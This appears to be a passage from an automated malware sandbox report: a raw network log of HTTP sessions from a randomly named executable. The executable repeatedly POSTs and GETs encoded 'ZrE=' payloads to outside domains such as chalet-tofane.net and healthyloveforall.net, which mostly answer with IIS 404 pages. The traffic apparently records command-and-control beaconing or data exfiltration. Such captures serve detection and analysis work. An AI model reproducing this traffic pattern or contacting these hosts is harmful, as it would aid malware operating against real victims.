                                                                                                                                                        Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                                                                                                                        Dec 5, 2024 05:40:27.948436975 CET1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                                                                                                                        Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                                                                                                                        Dec 5, 2024 05:40:27.948447943 CET228INData Raw: 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                                                                                                                                        Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        25192.168.2.65001262.149.128.40803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:29.312206984 CET1861OUTPOST /obbp/ HTTP/1.1
                                                                                                                                                        Host: www.chalet-tofane.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.chalet-tofane.net
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.chalet-tofane.net/obbp/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 6e 2b 47 59 6e 31 6a 6f 47 49 76 6c 2f 76 4e 2f 62 59 37 32 6c 6c 50 76 2b 64 4f 6a 35 35 50 69 58 71 49 44 65 58 4b 6c 7a 77 4e 6b 36 2f 67 38 4e 66 4c 70 54 34 63 2b 49 58 67 58 75 6b 54 47 65 69 6f 55 69 4d 39 55 46 4d 5a 45 79 67 4d 38 6e 48 79 51 5a 56 32 59 6c 44 35 53 59 30 69 34 6e 39 6f 57 74 42 58 73 47 64 38 4e 31 37 72 47 44 32 67 42 47 76 65 50 41 45 36 53 46 39 41 48 4d 66 33 6e 66 38 2b 2b 77 77 74 76 48 43 68 41 57 62 78 36 4f 63 57 4a 44 43 35 4b 37 53 55 70 6a 66 6d 6f 51 37 65 6f 78 35 4d 39 6a 35 4e 2f 2f 45 38 4d 6f 74 77 6c 66 53 68 45 73 66 76 55 47 68 56 4b 7a 4e 6a 47 67 44 44 2b 66 62 63 51 73 62 4a 79 44 58 52 36 48 49 34 66 46 4a 6f 4e 2f 49 4f 55 53 70 6a 6e 42 45 57 67 48 79 7a 52 32 2f 68 48 52 66 5a 74 63 48 63 65 46 51 46 50 45 6e 55 55 76 4c 41 48 41 43 77 6e 43 4d 38 63 59 6e 67 33 76 4f 49 6f 54 44 6c 4a 46 4b 6e 75 56 42 59 57 6b 70 5a 73 6a 35 53 56 4d 45 45 43 6e 77 57 72 45 7a 73 76 38 77 74 62 4a 70 4c 2b 52 51 58 38 6f 78 4d 4e 47 76 7a 39 77 4f [TRUNCATED]
                                                                                                                                                        Data Ascii: ZrE=n+GYn1joGIvl/vN/bY72llPv+dOj55PiXqIDeXKlzwNk6/g8NfLpT4c+IXgXukTGeioUiM9UFMZEygM8nHyQZV2YlD5SY0i4n9oWtBXsGd8N17rGD2gBGvePAE6SF9AHMf3nf8++wwtvHChAWbx6OcWJDC5K7SUpjfmoQ7eox5M9j5N//E8MotwlfShEsfvUGhVKzNjGgDD+fbcQsbJyDXR6HI4fFJoN/IOUSpjnBEWgHyzR2/hHRfZtcHceFQFPEnUUvLAHACwnCM8cYng3vOIoTDlJFKnuVBYWkpZsj5SVMEECnwWrEzsv8wtbJpL+RQX8oxMNGvz9wONg+0hhiN3e6qHilois5Va/j1PTR5SFUJnOr0MwVaiF4AzOO6WAyoE5OQlXxv0msd5iHukpR0cWAknHjpawe39JC4b+BCK4Dj8OVU16KaYut7yN8rnqCCoIkpSCtTRnx9sk1UXHp4AgE3QO985CIdpACl0cF6XthBCjGoYGPdShSATTZGMCsDk1DeYOg+M+RSAHQ3SkUrwTxRigUezQVFdmAlcI1o456Yoxd0+lfv/5bLj0MDeLLalBWkBd016fUso2IVKiklZd9VkY1xpG3uXJsk83FqSNKLMUWZpIbnU+6bInG9Gh+OF1/B2FHfePTSomCJdOoebhPzOkgivRedxoqwGFZ3FprjfsfnLwiYNxAmjfxcCNFhLHKFe7PPx7UmEVSTP+y5MCIentPniiFTb2rt+8ej3gIfSZW9X2L64Qc4o0D9u8m+/VmM31UaXBZbLvHi2kHLR4D3XoxcI5IgxJfCckyJHWvR+cdaBqqwRvxFO4gvSWIUZpnsaTpXIcdO+xBOeVGGxAsSyYriaNDqA8pH6LZfWxtLgXC7Jmozd72F8EFx0i+Ky0LLZXLOilh7IRAh5F5sLZ+BcvnT52MXYeo2FVnm2ftt1IENDsCtAN39f29FPTBn2uZPLGlX+yx3jUzesb1Pd8jsD/by7xr5cWwQfmQUG/gx6K [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:40:30.771307945 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                        Cache-Control: private
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:30 GMT
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Length: 4953
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:40:30.771481037 CET1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                                                                                                                        Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                                                                                                                        Dec 5, 2024 05:40:30.771492004 CET1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                                                                                                                        Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                                                                                                                        Dec 5, 2024 05:40:30.771502018 CET1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                                                                                                                        Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                                                                                                                        Dec 5, 2024 05:40:30.771511078 CET228INData Raw: 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                                                                                                                                        Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        26192.168.2.65001362.149.128.40803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:32.014066935 CET553OUTGET /obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCXFZjhm4RzxlyIFmCbk02gBov1+7TAel+jFtI3CD3Jdw5DP3HME6qP+mS3NVD/GMMnbyFe0QVN3VaJo=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.chalet-tofane.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:40:33.261049986 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                        Cache-Control: private
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:33 GMT
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Length: 5109
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:40:33.261071920 CET224INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                                                                                                                        Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;
                                                                                                                                                        Dec 5, 2024 05:40:33.261082888 CET1236INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79
                                                                                                                                                        Data Ascii: background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-container p{margin:0 0 10px 0; }#details-left{
                                                                                                                                                        Dec 5, 2024 05:40:33.261148930 CET1236INData Raw: 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65
                                                                                                                                                        Data Ascii: >HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely causes:</h4> <ul> <
                                                                                                                                                        Dec 5, 2024 05:40:33.261161089 CET1236INData Raw: 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c 65 72 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 48 61 6e 64 6c 65 72 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62
                                                                                                                                                        Data Ascii: bsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right">
                                                                                                                                                        Dec 5, 2024 05:40:33.261171103 CET160INData Raw: 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c 31 37 37 36 33 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66
                                                                                                                                                        Data Ascii: soft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        27192.168.2.6500143.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:38.896495104 CET836OUTPOST /566f/ HTTP/1.1
                                                                                                                                                        Host: www.healthyloveforall.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.healthyloveforall.net
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.healthyloveforall.net/566f/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 78 33 49 2b 50 39 4d 6d 75 58 6d 65 62 4b 6b 76 78 69 64 6c 62 77 46 64 69 6e 38 62 75 39 31 46 71 61 6d 63 41 76 33 70 64 62 59 76 6a 62 6a 73 34 58 2f 6f 32 50 66 63 55 71 54 61 36 65 66 65 76 6c 70 70 4c 53 79 58 53 59 50 50 2f 65 73 76 46 61 55 56 58 2f 72 63 5a 71 67 39 72 2f 33 4f 31 68 51 47 36 33 74 6f 65 70 6e 53 64 43 61 7a 6c 49 4b 2b 37 4e 36 46 6a 70 34 6e 7a 6e 73 77 68 74 30 7a 4e 43 2b 54 35 34 4d 50 51 58 4d 52 4a 68 30 7a 43 52 6e 43 4b 72 79 47 32 6d 49 65 51 32 50 4b 74 63 68 61 78 49 6b 52 38 44 66 6c 69 69 55 4b 75 49 6e 75 67 61 35 53 58 51 6e 35 32 58 66 37 66 68 78 6d 74 51 6a 75
                                                                                                                                                        Data Ascii: ZrE=x3I+P9MmuXmebKkvxidlbwFdin8bu91FqamcAv3pdbYvjbjs4X/o2PfcUqTa6efevlppLSyXSYPP/esvFaUVX/rcZqg9r/3O1hQG63toepnSdCazlIK+7N6Fjp4nznswht0zNC+T54MPQXMRJh0zCRnCKryG2mIeQ2PKtchaxIkR8DfliiUKuInuga5SXQn52Xf7fhxmtQju


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        28192.168.2.6500153.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:41.548202038 CET860OUTPOST /566f/ HTTP/1.1
                                                                                                                                                        Host: www.healthyloveforall.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.healthyloveforall.net
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.healthyloveforall.net/566f/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 78 33 49 2b 50 39 4d 6d 75 58 6d 65 64 71 55 76 33 42 6c 6c 4b 41 46 65 74 48 38 62 33 4e 31 42 71 61 71 63 41 71 50 35 65 70 73 76 74 65 66 73 35 54 4c 6f 6a 50 66 63 66 4b 54 66 35 75 66 58 76 69 67 63 4c 58 79 58 53 59 62 50 2f 66 77 76 46 72 55 57 46 66 72 61 42 61 67 2f 6d 66 33 4f 31 68 51 47 36 33 35 52 65 6f 50 53 61 79 71 7a 6b 73 2b 39 31 74 36 45 67 70 34 6e 34 48 73 30 68 74 31 6b 4e 48 6d 31 35 36 30 50 51 58 63 52 49 31 41 73 4a 52 6d 48 55 62 7a 54 2f 32 31 41 5a 46 43 57 78 65 56 36 78 4b 55 6b 30 56 65 2f 2b 52 55 70 38 59 48 73 67 59 68 67 58 77 6e 54 30 58 6e 37 4e 32 39 42 69 6b 47 4e 44 75 31 59 68 55 48 74 36 47 55 57 79 35 78 6b 4f 4e 49 50 66 67 3d 3d
                                                                                                                                                        Data Ascii: ZrE=x3I+P9MmuXmedqUv3BllKAFetH8b3N1BqaqcAqP5epsvtefs5TLojPfcfKTf5ufXvigcLXyXSYbP/fwvFrUWFfraBag/mf3O1hQG635ReoPSayqzks+91t6Egp4n4Hs0ht1kNHm1560PQXcRI1AsJRmHUbzT/21AZFCWxeV6xKUk0Ve/+RUp8YHsgYhgXwnT0Xn7N29BikGNDu1YhUHt6GUWy5xkONIPfg==


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        29192.168.2.6500163.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:44.202023029 CET1873OUTPOST /566f/ HTTP/1.1
                                                                                                                                                        Host: www.healthyloveforall.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.healthyloveforall.net
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.healthyloveforall.net/566f/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 78 33 49 2b 50 39 4d 6d 75 58 6d 65 64 71 55 76 33 42 6c 6c 4b 41 46 65 74 48 38 62 33 4e 31 42 71 61 71 63 41 71 50 35 65 70 55 76 74 73 48 73 37 79 4c 6f 6c 2f 66 63 57 71 54 65 35 75 65 56 76 6a 45 59 4c 58 4f 70 53 62 6a 50 2f 39 34 76 44 59 4d 57 63 76 72 61 49 36 67 38 72 2f 32 4d 31 68 41 43 36 33 70 52 65 6f 50 53 61 77 79 7a 6a 34 4b 39 33 74 36 46 6a 70 34 72 7a 6e 73 4d 68 74 38 52 4e 47 53 44 2b 4f 41 50 54 7a 41 52 4b 47 6f 73 41 52 6d 4a 56 62 79 51 2f 32 35 68 5a 46 65 61 78 65 4e 41 78 4b 77 6b 33 68 72 54 73 67 46 79 70 4a 4c 51 30 71 4a 46 66 6d 72 61 77 56 58 34 4a 6d 74 58 6c 58 4f 30 44 6f 78 42 72 30 6e 75 30 55 30 30 30 38 73 46 48 73 46 4b 62 37 37 30 76 4a 45 31 62 46 39 31 37 34 57 75 30 5a 6c 59 41 43 4b 49 34 4c 32 4c 2b 61 31 55 43 6c 39 44 4b 70 4b 65 4b 54 32 67 57 54 6f 59 5a 48 39 57 77 4b 36 6c 2b 71 78 6f 50 35 58 38 2b 44 68 30 62 5a 53 5a 63 71 58 44 56 77 36 71 41 44 34 44 6f 51 58 4d 74 52 51 38 38 31 33 33 45 53 41 48 2b 77 39 69 43 65 70 75 4e 45 [TRUNCATED]
